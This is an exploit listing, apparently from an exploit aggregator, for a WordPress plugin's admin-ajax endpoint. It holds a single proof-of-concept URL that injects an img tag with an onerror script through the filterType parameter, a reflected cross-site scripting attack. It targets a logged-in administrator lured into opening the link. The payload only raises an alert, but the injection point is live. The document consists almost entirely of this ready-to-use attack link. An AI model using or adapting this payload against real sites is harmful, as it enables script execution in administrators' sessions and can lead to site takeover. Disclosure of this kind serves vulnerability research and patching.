Share
## https://sploitus.com/exploit?id=WPEX-ID:DC3A841D-A95B-462E-BE4B-ACAA44E77264
Make a logged in admin open https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src%20onerror=alert(`XSS`)%3E